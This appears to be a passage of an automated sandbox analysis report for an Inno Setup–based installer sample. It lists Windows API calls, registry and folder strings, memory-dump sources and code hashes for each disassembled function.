                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Append$System
                                                                                                      • String ID:
                                                                                                      • API String ID: 1489644407-0
                                                                                                      • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                      • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                      • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                      • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                      APIs
                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                      • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                      • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$DispatchPeekTranslate
                                                                                                      • String ID:
                                                                                                      • API String ID: 4217535847-0
                                                                                                      • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                      • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                      • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                      • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                      APIs
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                      • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Prop$Window
                                                                                                      • String ID:
                                                                                                      • API String ID: 3363284559-0
                                                                                                      • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                      • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                      • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                      • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                      • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                      • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$EnableEnabledVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3234591441-0
                                                                                                      • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                      • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                      • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                      • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: PrepareToInstall
                                                                                                      • API String ID: 2558294473-1101760603
                                                                                                      • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                      • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                      • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                      • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: /:*?"<>|
                                                                                                      • API String ID: 0-4078764451
                                                                                                      • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                      • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                      • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                      • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                      APIs
                                                                                                      • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ActiveWindow
                                                                                                      • String ID: InitializeWizard
                                                                                                      • API String ID: 2558294473-2356795471
                                                                                                      • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                      • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                      • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                      • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                      Strings
                                                                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
Memory Dump Source
• Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
Similarity
• API ID: CloseOpen
• String ID: Software\Microsoft\Windows\CurrentVersion
• API String ID: 47109696-1019749484
• Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
• Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
• Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
APIs
• RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
Strings
• Inno Setup: Setup Version, xrefs: 0046EE65
Similarity
• API ID: Value
• String ID: Inno Setup: Setup Version
• API String ID: 3702945584-4166306022
• Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
• Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
• Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
APIs
• RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
Similarity
• API ID: Value
• String ID: NoModify
• API String ID: 3702945584-1699962838
• Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
• Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
• Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
APIs
• GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
  • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
  • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
  • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
• SendNotifyMessageA.USER32(00010434,00000496,00002711,-00000001), ref: 0047E6BA
Similarity
• API ID: EnumFontsMessageNotifyReleaseSend
• String ID:
• API String ID: 2649214853-0
• Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
• Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
• Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
  • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
Similarity
• API ID: ByteCharMetricsMultiSystemWide
• String ID: /G
• API String ID: 224039744-2088674125
• Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
• Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
• Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
• Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
APIs
• RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
• RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
Similarity
• API ID: CloseEnum
• String ID:
• API String ID: 2818636725-0
• Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
• Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
• Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
• Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
APIs
• CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
• GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
Similarity
• API ID: CreateErrorLastProcess
• String ID:
• API String ID: 2919029540-0
• Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
• Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
• Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
• Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
APIs
• FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
• FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
Similarity
• API ID: Resource$FindFree
• String ID:
• API String ID: 4097029671-0
• Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
• Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
• Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
APIs
• GetCurrentThreadId.KERNEL32 ref: 0041EEF3
• EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
Similarity
• API ID: Thread$CurrentEnumWindows
• String ID:
• API String ID: 2396873506-0
• Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
• Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
• Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
APIs
• MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
• GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 55378915-0
                                                                                                      • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                      • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                      • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                      • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1375471231-0
                                                                                                      • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                      • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                      • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                      • Instruction Fuzzy Hash: 40F02871A00308BBCB01EF759D4259EB7E8EB4E311B2045B7FC04E3642E6B94E04859C
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00423249
                                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 00423273
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 3238433803-0
                                                                                                      • Opcode ID: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                      • Instruction ID: 5e34cf6406f075c2c63d733b1f02ef4b9a88184ee1572dc0f3c8875cc615d59b
                                                                                                      • Opcode Fuzzy Hash: 0c9a104e89a33193f60416200903d3bd70bbd31149720632682593485f60625b
                                                                                                      • Instruction Fuzzy Hash: 9EF0A711B04254AADA109E7E6CC0D6B72A8DF82735B61037BFA3EC72D1C62E1D414569
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLibraryLoadMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2987862817-0
                                                                                                      • Opcode ID: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                      • Instruction ID: 14c2566281f292fbf4bc3f3871eddb8f7eb4f11f4d1149329263d7d1c8790498
                                                                                                      • Opcode Fuzzy Hash: 4bb5710dc3172506f3a82e57bec548632d1945d06b3d92e94bd16d63dfaa8550
                                                                                                      • Instruction Fuzzy Hash: 02F08970B147447FDB119F779CA241BBBECDB49B1175249B6F800A3591E53C4910C928
                                                                                                      APIs
                                                                                                      • SHGetKnownFolderPath.SHELL32(00499D40,00008000,00000000,?), ref: 0047C89B
                                                                                                      • CoTaskMemFree.OLE32(?,0047C8DE), ref: 0047C8D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FolderFreeKnownPathTask
                                                                                                      • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                                      • API String ID: 969438705-544719455
                                                                                                      • Opcode ID: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                      • Instruction ID: f48ec61de784b6bea0373c7a91bc006da4a0813e938d35ae17fa89473a65de5f
                                                                                                      • Opcode Fuzzy Hash: c380859d91d2530b1710b7ab5da91f48806622674321ef44444f1ad2bc0d7433
                                                                                                      • Instruction Fuzzy Hash: 22E09230340604BFEB15EB61DC92F6977A8EB48B01B72847BF504E2680D67CAD00DB1C
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 0045090E
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,00470149,?,00000000), ref: 00450916
                                                                                                        • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: ec46a7bc9e5a7a34518fa7989fb6988307d7ef9dfce9dbcd61575ad1106d4b51
                                                                                                      • Instruction ID: 32d43412562f4d6ab64aa8be608e77008e370c57458e4df53f7444e76f76d0cb
